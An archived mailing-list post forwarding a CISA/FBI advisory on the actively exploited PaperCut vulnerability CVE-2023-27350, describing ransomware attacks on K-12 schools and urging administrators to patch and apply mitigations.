[Tech-l] Cybersecurity Advisory - PaperCut Vulnerability
Thor Sage
sage at mveca.org
Fri May 12 09:57:38 EDT 2023
Good morning,
We know that we have a number of client organizations using PaperCut. See below for important information on an exploited vulnerability in that application.
Thank you,
Thor
Thor Sage
Executive Director
Miami Valley Educational Computer Association
937-767-1468 x3101
[http://www.mveca.org/images/logo.gif]<http://www.mveca.org/> [i] <https://www.linkedin.com/company/mveca/> [t] <https://twitter.com/mvecarcog>
Not-for-profit Technology Services for Education and Local Governments
From: Wood, Spencer <Spencer.Wood at cisa.dhs.gov<mailto:Spencer.Wood at cisa.dhs.gov>>
Date: Friday, May 12, 2023 at 8:31 AM
To: Geoffrey Andrews <geoffrey.andrews at managementcouncil.org<mailto:geoffrey.andrews at managementcouncil.org>>, Holly.Drake at das.ohio.gov<mailto:Holly.Drake at das.ohio.gov> <holly.drake at das.ohio.gov<mailto:holly.drake at das.ohio.gov>>, jmccarty at oh-tech.org<mailto:jmccarty at oh-tech.org> <jmccarty at oh-tech.org<mailto:jmccarty at oh-tech.org>>
Cc: kirk.herath at governor.ohio.gov<mailto:kirk.herath at governor.ohio.gov> <kirk.herath at governor.ohio.gov<mailto:kirk.herath at governor.ohio.gov>>, Burner, Jillian <jburner at ohiosos.gov<mailto:jburner at ohiosos.gov>>, Williams, Terin (She/Her/Hers) <terin.williams at cisa.dhs.gov<mailto:terin.williams at cisa.dhs.gov>>
Subject: CISA/FBI Cybersecurity Advisory on Actors Exploiting a Vulnerability in PaperCut
Good morning,
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA)<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a> about active exploitation by malicious cyber actors of known vulnerability in print management software known as PaperCut.
* The vulnerability, CVE-2023-27350, occurs in certain versions of PaperCut. When exploited, an unauthenticated actor can execute malicious code remotely without credentials.
* In early May 2023, FBI observed a group self-identifying as the Bl00dy Ransomware Gang attempting to exploit vulnerable PaperCut servers against the Education Facilities Subsector, including K-12 schools and school districts, that were exposed over the web. Some of these operations by this gang led to data exfiltration, encryption and ransom notes left on victim systems.
* PaperCut released a patch for CVE-2023-27350 in March 2023. Users and administrators are strongly urged to immediately apply patches, and workarounds if unable to patch.
* All organizations, especially K-12 schools and school districts, are strongly encouraged to implement the recommended mitigations and use the detection methods in this advisory to reduce the likelihood and impact of a ransomware incident related to the PaperCut vulnerability and exploits by Bl00dy Ransomware Group.
The advisory can be found at: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
Technical Details
CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on certain affected versions of PaperCut, a print management software.
* PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls thereby allowing malicious actors to bypass user authentication and access the server as an administrator.
* When exploited, an unauthenticated actor is able to execute malicious code remotely without credentials.
* When PaperCut is exploited to execute other processes such as cmd.exe or powershell.exe, a wide range of postexploitation activity is possible following initial access and compromise.
Education Facilities Subsector, such as educational institutions, K-12 schools and school districts, maintained approximately 68% of exposed, but not necessarily vulnerable, United States-based PaperCut servers.
* In early May 2023, the Federal Bureau of Investigation (FBI) observed the Bl00dy Ransomware Gang gain access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed over the web.
* The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files.
* FBI has observed certain command and control (C2) malware, as well as legitimate remote management and maintenance (RMM) software such as Atera, ConnectWise (formerly ScreenConnect), and Syncro downloaded onto victim systems by the ransomware gang.
If you have any questions and would like to discuss this or any other items, please feel free to contact Terin or myself.
Thank you,
Spencer
---
Spencer Wood
Cybersecurity Advisor, Region 5 (OH)
Cybersecurity and Infrastructure Security Agency
O: 202-793-4498 | M: 513-693-2792 | spencer.wood at cisa.dhs.gov<mailto:spencer.wood at cisa.dhs.gov>
[cid:image006.jpg at 01D984B8.2DE03EA0]
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listserv.mveca.org/pipermail/tech-l/attachments/20230512/7accb8ac/attachment-0001.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.jpg
Type: image/jpeg
Size: 3184 bytes
Desc: image001.jpg
URL: <http://listserv.mveca.org/pipermail/tech-l/attachments/20230512/7accb8ac/attachment-0004.jpg>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image002.jpg
Type: image/jpeg
Size: 1229 bytes
Desc: image002.jpg
URL: <http://listserv.mveca.org/pipermail/tech-l/attachments/20230512/7accb8ac/attachment-0005.jpg>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image003.jpg
Type: image/jpeg
Size: 1197 bytes
Desc: image003.jpg
URL: <http://listserv.mveca.org/pipermail/tech-l/attachments/20230512/7accb8ac/attachment-0006.jpg>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image006.jpg
Type: image/jpeg
Size: 3160 bytes
Desc: image006.jpg
URL: <http://listserv.mveca.org/pipermail/tech-l/attachments/20230512/7accb8ac/attachment-0007.jpg>
More information about the Tech-l
mailing list